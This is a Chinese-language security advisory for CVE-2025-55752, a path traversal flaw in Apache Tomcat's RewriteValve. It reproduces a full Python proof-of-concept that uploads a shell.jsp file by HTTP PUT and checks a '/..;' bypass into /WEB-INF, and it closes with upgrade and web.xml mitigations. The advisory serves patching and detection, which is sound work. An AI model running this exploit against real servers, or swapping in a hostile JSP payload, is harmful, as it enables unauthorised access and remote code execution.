CVSS评分:7.5
CVE-2025-55752_ Apache Tomcat 安全漏洞
1. 漏洞原理
CVE-2025-55752 是 Apache Tomcat 中一个 相对路径遍历(Relative Path Traversal)漏洞。简单来说,这个漏洞允许攻击者通过精心构造的 URL 绕过安全约束,并且在某些条件下可能导致 RCE
漏洞发生在 Tomcat 的 URI 重写(RewriteValve)处理逻辑:
- URL 先被规范化(simplified/normalized)
- 然后才解码(URL decoded)
正确的安全逻辑应该是先解码,再规范化路径。但是因为顺序错误,攻击者可以利用 URL 编码技巧(如 %2e%2e 代表 ..)来避开安全检查
可利用的 POC:https://github.com/TAM-K592/CVE-2025-55752/
python
import requests
import argparse
import urllib3
import sys
from urllib.parse import quote
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
BANNER = """
CVE-2025-55752 Tomcat Path Bypass & Upload Detection Script
============================================================
This tool attempts to exploit a Rewrite Valve + normalization bypass to upload a test JSP file
into a protected location (like /WEB-INF) and verify if the server is vulnerable to CVE-2025-55752.
"""
def attempt_put_upload(target, filename, payload, verify_ssl):
upload_path = f"/{filename}"
url = f"{target}{upload_path}"
try:
print(f"[+] Attempting to upload payload to: {url}")
response = requests.put(url, data=payload, verify=verify_ssl, timeout=10)
if response.status_code in [200, 201, 204]:
print(f"[+] Upload successful! Response code: {response.status_code}")
return upload_path
else:
print(f"[-] Upload failed! Response code: {response.status_code}")
return None
except Exception as e:
print(f"[!] Upload error: {e}")
return None
def check_access(target, path, verify_ssl):
bypass_path = f"/..;{path}"
url = f"{target}{bypass_path}"
try:
print(f"[+] Checking access to: {url}")
response = requests.get(url, verify=verify_ssl, timeout=10)
if response.status_code == 200:
print("[+] Bypass successful! Target may be vulnerable.")
return True
else:
print(f"[-] Access denied or not vulnerable (HTTP {response.status_code}).")
return False
except Exception as e:
print(f"[!] Access check error: {e}")
return False
def main():
parser = argparse.ArgumentParser(description="CVE-2025-55752 Exploit & Detection Tool")
parser.add_argument("url", help="Target base URL (e.g., http://127.0.0.1:8080)")
parser.add_argument("--filename", default="shell.jsp", help="Filename to upload (default: shell.jsp)")
parser.add_argument("--payload", default="<% out.println(\"Bypassed!\"); %>", help="Payload content to upload")
parser.add_argument("--check", action="store_true", help="Only check for path bypass without uploading")
parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL certificate verification")
args = parser.parse_args()
print(BANNER)
verify_ssl = not args.no_ssl_verify
if not args.url.startswith("http"):
print("[-] Please include http:// or https:// in the URL")
sys.exit(1)
if args.check:
check_access(args.url, f"/WEB-INF/{args.filename}", verify_ssl)
else:
uploaded_path = attempt_put_upload(args.url, args.filename, args.payload, verify_ssl)
if uploaded_path:
check_access(args.url, f"/WEB-INF/{args.filename}", verify_ssl)
if __name__ == "__main__":
main()2. 漏洞危害
微步提示中风险:
如果 Tomcat 部署启用了 HTTP PUT 请求 或者暴露了可写接口,在成功绕过目录保护后 上传恶意文件(如 JSP/Servlet 代码),可进一步触发 RCE
3. 漏洞修复
升级版本修复
升级到修复版本:
- Tomcat 11.0.11 或更高
- Tomcat 10.1.45 或更高
- Tomcat 9.0.109 或更高
配置修复
若非必要,禁用Tomcat的PUT请求功能,减少攻击面。可在conf/web.xml中配置:
xml
<!-- 禁用PUT请求示例 -->
<security-constraint>
<web-resource-collection>
<web-resource-name>Disable PUT</web-resource-name>
<url-pattern>/*</url-pattern>
<http-method>PUT</http-method>
</web-resource-collection>
<auth-constraint/>
</security-constraint>确保web.xml中的安全约束配置正确,限制对敏感目录的访问:
xml
<!-- 示例:在web.xml中添加安全约束 -->
<security-constraint>
<web-resource-collection>
<web-resource-name>Protected Area</web-resource-name>
<url-pattern>/WEB-INF/*</url-pattern>
<url-pattern>/META-INF/*</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>
</security-constraint>